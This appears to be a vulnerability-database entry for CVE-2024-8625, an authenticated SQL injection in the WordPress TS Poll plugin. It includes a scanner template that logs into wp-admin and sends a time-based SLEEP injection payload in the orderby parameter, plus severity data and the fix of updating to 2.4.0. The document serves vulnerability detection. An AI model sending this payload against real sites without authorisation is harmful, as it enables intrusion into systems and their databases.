/Vulnerability Library

WordPress TS Poll < 2.4.0 - SQL Injection

CVE-2024-8625
Verified

Description

WordPress TS Poll plugin < 2.4.0 contains a SQL injection caused by lack of sanitization and escaping of a parameter before using it in a SQL statement, letting attackers perform SQL injection attacks, exploit requires admin privileges.

Severity

High

CVSS Score

7.2

Exploit Probability

2%

Affected Product

ts_poll

Published Date

February 18, 2026

Template Author

riteshs4hu

CVE-2024-8625.yaml
id: CVE-2024-8625

info:
  name: WordPress TS Poll < 2.4.0 - SQL Injection
  author: riteshs4hu
  severity: high
  description: |
    WordPress TS Poll plugin < 2.4.0 contains a SQL injection caused by lack of sanitization and escaping of a parameter before using it in a SQL statement, letting attackers perform SQL injection attacks, exploit requires admin privileges.
  impact: |
    Attackers can execute arbitrary SQL commands, potentially leading to data theft, modification, or deletion.
  remediation: |
    Update to version 2.4.0 or later.
  reference:
    - https://wpscan.com/vulnerability/ab4d7065-4ea2-4233-9593-0f540f91f45e/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-8625
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 7.2
    cve-id: CVE-2024-8625
    cwe-id: CWE-89
    epss-score: 0.02277
    epss-percentile: 0.80981
    cpe: cpe:2.3:a:total-soft:ts_poll:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: total-soft
    product: ts_poll
  tags: cve,cve2024,wordpress,wp-plugin,wp,ts-poll,sqli,authenticated

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: wordpress_test_cookie=WP%20Cookie%20check

        log={{username}}&pwd={{password}}&wp-submit=Log+In&redirect_to={{RootURL}}/wp-admin/&testcookie=1

    matchers:
      - type: dsl
        dsl:
          - status_code == 302
          - contains(header, "wordpress_logged_in")
        condition: and
        internal: true

  - raw:
      - |
        @timeout: 30s
        GET /wp-admin/admin.php?page=ts-poll&orderby=(SELECT+6127+FROM+(SELECT(SLEEP(7)))mIWx)&order=desc HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'duration >= 7'
          - 'status_code == 200'
          - 'contains(body, "All TS Poll")'
        condition: and
# digest: 4a0a00473045022100cd382774a096aab70dd846ea037640aa8ecb9e35d466e8de91c64e1ec2b879900220215377b6b9af27ee66730d2004c2c621280ff965cfc4532f3a9ebafa6f9f2577:922c64590222798bb761d5b6d8e72950
7.2Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
CVE ID:
cve-2024-8625
CWE ID:
cwe-89

References

https://wpscan.com/vulnerability/ab4d7065-4ea2-4233-9593-0f540f91f45e/https://nvd.nist.gov/vuln/detail/CVE-2024-8625

Remediation Steps

Update to version 2.4.0 or later.